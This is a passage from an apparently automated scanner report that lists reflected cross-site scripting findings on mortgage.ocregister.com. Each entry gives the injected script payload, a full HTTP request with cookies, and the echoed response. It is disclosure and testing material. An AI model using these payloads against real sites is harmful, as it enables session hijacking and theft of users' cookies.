XSS, mortgage.ocregister.com, Cross Site Scripting

Severity:	High
Confidence:	Certain
Host:	http://mortgage.ocregister.com
Path:	/feeda71cd"><script>alert(document.cookie)</script>1f35e8c0ea2/feed/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 5b243<script>alert(1)</script>b89f925ed73 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /feeda71cd"><script>alert(document.cookie)</script>1f35e8c0ea2/feed5b243<script>alert(1)</script>b89f925ed73/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:07:56 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:07:56 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62675

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
</script>1f35e8c0ea2/feed5b243<script>alert(1)</script>b89f925ed73/feed/" />
...[SNIP]...

1.181. http://mortgage.ocregister.com/feeda71cd%2522%253E%253Cscript%253Ealert(1 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://mortgage.ocregister.com
Path:	/feeda71cd%2522%253E%253Cscript%253Ealert(1

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4a614"><script>alert(1)</script>e492f5d219d was submitted in the REST URL parameter 1. This input was echoed as 4a614\"><script>alert(1)</script>e492f5d219d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /feeda71cd%2522%253E%253Cscript%253Ealert(14a614"><script>alert(1)</script>e492f5d219d HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:08:17 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:08:18 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62652

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/feeda71cd%2522%253E%253Cscript%253Ealert(14a614\"><script>alert(1)</script>e492f5d219dfeed/" />
...[SNIP]...

1.182. http://mortgage.ocregister.com/feeda71cd%2522%253E%253Cscript%253Ealert(1 [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://mortgage.ocregister.com
Path:	/feeda71cd%2522%253E%253Cscript%253Ealert(1

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ee1f2"><script>alert(1)</script>14894bf18ef was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ee1f2\"><script>alert(1)</script>14894bf18ef in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /feeda71cd%2522%253E%253Cscript%253Ealert(1?ee1f2"><script>alert(1)</script>14894bf18ef=1 HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:08:13 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:08:13 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62689

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/feeda71cd%2522%253E%253Cscript%253Ealert(1?ee1f2\"><script>alert(1)</script>14894bf18ef=1feed/" />
...[SNIP]...

1.183. http://mortgage.ocregister.com/feeda71cd%2522%253E%253Cscript%253Ealert(document.cookie [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://mortgage.ocregister.com
Path:	/feeda71cd%2522%253E%253Cscript%253Ealert(document.cookie

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2efa0"><script>alert(1)</script>c5d2576f89d was submitted in the REST URL parameter 1. This input was echoed as 2efa0\"><script>alert(1)</script>c5d2576f89d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /feeda71cd%2522%253E%253Cscript%253Ealert(document.cookie2efa0"><script>alert(1)</script>c5d2576f89d HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:14:50 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:14:51 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62702

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/feeda71cd%2522%253E%253Cscript%253Ealert(document.cookie2efa0\"><script>alert(1)</script>c5d2576f89dfeed/" />
...[SNIP]...

1.184. http://mortgage.ocregister.com/feeda71cd%2522%253E%253Cscript%253Ealert(document.cookie [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://mortgage.ocregister.com
Path:	/feeda71cd%2522%253E%253Cscript%253Ealert(document.cookie

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 19724"><script>alert(1)</script>5a15440a445 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 19724\"><script>alert(1)</script>5a15440a445 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /feeda71cd%2522%253E%253Cscript%253Ealert(document.cookie?19724"><script>alert(1)</script>5a15440a445=1 HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:14:46 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:14:47 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62704

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
el="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/feeda71cd%2522%253E%253Cscript%253Ealert(document.cookie?19724\"><script>alert(1)</script>5a15440a445=1feed/" />
...[SNIP]...

1.185. http://mortgage.ocregister.com/files [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://mortgage.ocregister.com
Path:	/files

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7804f"><script>alert(1)</script>b31526e044f was submitted in the REST URL parameter 1. This input was echoed as 7804f\"><script>alert(1)</script>b31526e044f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /files7804f"><script>alert(1)</script>b31526e044f HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:08:20 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:08:20 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62648

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/files7804f\"><script>alert(1)</script>b31526e044ffeed/" />
...[SNIP]...

1.186. http://mortgage.ocregister.com/files [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://mortgage.ocregister.com
Path:	/files

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3bcea"><script>alert(1)</script>d63783f7e5a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 3bcea\"><script>alert(1)</script>d63783f7e5a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /files?3bcea"><script>alert(1)</script>d63783f7e5a=1 HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:08:16 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:08:16 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62652

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/files?3bcea\"><script>alert(1)</script>d63783f7e5a=1feed/" />
...[SNIP]...

1.187. http://mortgage.ocregister.com/ver1.0/Content/dmhotlinks.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://mortgage.ocregister.com
Path:	/ver1.0/Content/dmhotlinks.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 12f7c"><script>alert(1)</script>5e4882fdc7d was submitted in the REST URL parameter 1. This input was echoed as 12f7c\"><script>alert(1)</script>5e4882fdc7d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ver1.012f7c"><script>alert(1)</script>5e4882fdc7d/Content/dmhotlinks.css HTTP/1.1
Host: mortgage.ocregister.com
Proxy-Connection: keep-alive
Referer: http://mortgage.ocregister.com/feeda71cd%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E1f35e8c0ea2/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 44146092a8373b49c062f68d9825aa14=1; s_lastvisit=1296750717165; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_w=1296972000168%26vn%3D1; s_vnum_m=1298959200170%26vn%3D1; s_cc=true; s_nr=1296750723302; sinvisit_w=true; sinvisit_m=true; s_sq=%5B%5BB%5D%5D; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; AxData=; Axxd=1

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:03:02 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:03:03 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Length: 62655

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/ver1.012f7c\"><script>alert(1)</script>5e4882fdc7d/Content/dmhotlinks.cssfeed/" />
...[SNIP]...

1.188. http://mortgage.ocregister.com/ver1.0/Content/dmhotlinks.css [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://mortgage.ocregister.com
Path:	/ver1.0/Content/dmhotlinks.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 17b7a"><script>alert(1)</script>df3c8a873d1 was submitted in the REST URL parameter 2. This input was echoed as 17b7a\"><script>alert(1)</script>df3c8a873d1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ver1.0/Content17b7a"><script>alert(1)</script>df3c8a873d1/dmhotlinks.css HTTP/1.1
Host: mortgage.ocregister.com
Proxy-Connection: keep-alive
Referer: http://mortgage.ocregister.com/feeda71cd%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E1f35e8c0ea2/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 44146092a8373b49c062f68d9825aa14=1; s_lastvisit=1296750717165; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_w=1296972000168%26vn%3D1; s_vnum_m=1298959200170%26vn%3D1; s_cc=true; s_nr=1296750723302; sinvisit_w=true; sinvisit_m=true; s_sq=%5B%5BB%5D%5D; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; AxData=; Axxd=1

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:03:05 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:03:05 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Length: 62667

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/ver1.0/Content17b7a\"><script>alert(1)</script>df3c8a873d1/dmhotlinks.cssfeed/" />
...[SNIP]...

1.189. http://mortgage.ocregister.com/ver1.0/Content/dmhotlinks.css [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://mortgage.ocregister.com
Path:	/ver1.0/Content/dmhotlinks.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 92232"><script>alert(1)</script>8606eb47764 was submitted in the REST URL parameter 3. This input was echoed as 92232\"><script>alert(1)</script>8606eb47764 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ver1.0/Content/dmhotlinks.css92232"><script>alert(1)</script>8606eb47764 HTTP/1.1
Host: mortgage.ocregister.com
Proxy-Connection: keep-alive
Referer: http://mortgage.ocregister.com/feeda71cd%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E1f35e8c0ea2/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 44146092a8373b49c062f68d9825aa14=1; s_lastvisit=1296750717165; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_w=1296972000168%26vn%3D1; s_vnum_m=1298959200170%26vn%3D1; s_cc=true; s_nr=1296750723302; sinvisit_w=true; sinvisit_m=true; s_sq=%5B%5BB%5D%5D; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; AxData=; Axxd=1

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:03:08 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:03:08 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Length: 62655

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/ver1.0/Content/dmhotlinks.css92232\"><script>alert(1)</script>8606eb47764feed/" />
...[SNIP]...

1.190. http://mortgage.ocregister.com/wp-content/plugins/democracy/basic.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://mortgage.ocregister.com
Path:	/wp-content/plugins/democracy/basic.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 766d1"><script>alert(1)</script>8572d6a55e6 was submitted in the REST URL parameter 1. This input was echoed as 766d1\"><script>alert(1)</script>8572d6a55e6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /766d1"><script>alert(1)</script>8572d6a55e6/plugins/democracy/basic.css HTTP/1.1
Host: mortgage.ocregister.com
Proxy-Connection: keep-alive
Referer: http://mortgage.ocregister.com/feeda71cd%22%3E%3Cscript%3Ealert(1)%3C/script%3E1f35e8c0ea2/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:01:22 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:01:23 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Length: 62654

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/766d1\"><script>alert(1)</script>8572d6a55e6/plugins/democracy/basic.cssfeed/" />
...[SNIP]...

1.191. http://mortgage.ocregister.com/wp-content/plugins/democracy/democracy.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://mortgage.ocregister.com
Path:	/wp-content/plugins/democracy/democracy.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e1fb8"><script>alert(1)</script>a22401a108a was submitted in the REST URL parameter 1. This input was echoed as e1fb8\"><script>alert(1)</script>a22401a108a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /e1fb8"><script>alert(1)</script>a22401a108a/plugins/democracy/democracy.js HTTP/1.1
Host: mortgage.ocregister.com
Proxy-Connection: keep-alive
Referer: http://mortgage.ocregister.com/feeda71cd%22%3E%3Cscript%3Ealert(1)%3C/script%3E1f35e8c0ea2/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:01:13 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:01:14 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Length: 62657

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/e1fb8\"><script>alert(1)</script>a22401a108a/plugins/democracy/democracy.jsfeed/" />
...[SNIP]...

1.192. http://mortgage.ocregister.com/wp-content/plugins/democracy/style.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://mortgage.ocregister.com
Path:	/wp-content/plugins/democracy/style.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cf114"><script>alert(1)</script>95836e536ce was submitted in the REST URL parameter 1. This input was echoed as cf114\"><script>alert(1)</script>95836e536ce in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cf114"><script>alert(1)</script>95836e536ce/plugins/democracy/style.css HTTP/1.1
Host: mortgage.ocregister.com
Proxy-Connection: keep-alive
Referer: http://mortgage.ocregister.com/feeda71cd%22%3E%3Cscript%3Ealert(1)%3C/script%3E1f35e8c0ea2/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:01:10 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:01:11 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Length: 62654

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
